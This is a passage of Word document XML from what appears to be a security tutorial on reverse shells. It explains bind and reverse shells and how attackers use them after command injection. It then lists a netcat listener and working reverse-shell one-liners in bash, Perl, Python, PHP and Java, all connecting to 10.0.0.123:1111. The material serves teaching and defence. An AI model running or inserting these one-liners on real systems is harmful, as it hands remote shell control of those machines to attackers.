          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To establish a typical remote shell, a machine controlled by the attacker connects to a remote network host and requests a shell session – this is called a bind shell. But what if the remote host is not directly accessible, for example because it has no public IP or is protected by a firewall? In this situation, a reverse shell might be used, where the target machine initiates an outgoing connection to a listening network host and a shell session is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33FD21" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells are often the only way to perform remote maintenance on hosts behind a NAT, so they have legitimate administrative uses. However, they can also be used by cybercriminals to execute operating system commands on hosts protected from incoming connections by a firewall or other network security systems. For example, a piece of malware installed on a local workstation via a phishing email or a malicious website might initiate an outgoing connection to a command server and provide hackers with a reverse shell capability. Firewalls mostly filter incoming traffic, so an outgoing connection to a listening server will often succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482D307" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E666B7" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse Shell Code Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FF7D02" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>To start with, the attacker needs to start a listener process on their system to listen for reverse shell connections incoming to their IP address, for example 10.0.0.123. On Linux, this can be as simple as one netcat command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B7963" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -l -p 1111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CA5A1" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>This will start a netcat listener on port 1111. Now the attacker needs to (manually or automatically) execute code on the remote machine to connect to the listener. Many ready reverse shell codes exist for various systems and languages – see </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>pentestmonkey’s Reverse Shell Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> for an extensive list. Kali Linux also comes with a </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>set of ready webshells</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">, including reverse shells. Codes are typically one-liners to allow injection using a single command. While the examples below are for Linux and other Unix-like </w:t>
      </w:r>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AE315" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bash Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6956A" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698ED5DA" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/10.0.0.123/1111 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AEFDF0" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Perl Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50AFAF" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>As with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570C210" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>perl -e 'use Socket;$i="10.0.0.123";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1B275" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Python Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B819C1" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>With </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:anchor="top-languages" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Python continuing to gain popularity</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, there’s a good chance it’s available on the target server and can be used to execute a script like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0E67D" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.123",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34574066" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PHP Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E4D9E" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &amp;3 doesn’t work, you can try subsequent numbers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61046197" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>php -r '$sock=fsockopen("10.0.0.123",1111);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020CABB" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Java Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E187E" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Java is likely to be available on application servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE41DE" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>r = Runtime.getRuntime()</w:t>
      </w:r>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/10.0.0.123/1111;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])</w:t>
      </w:r>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>p.waitFor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC183F3" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
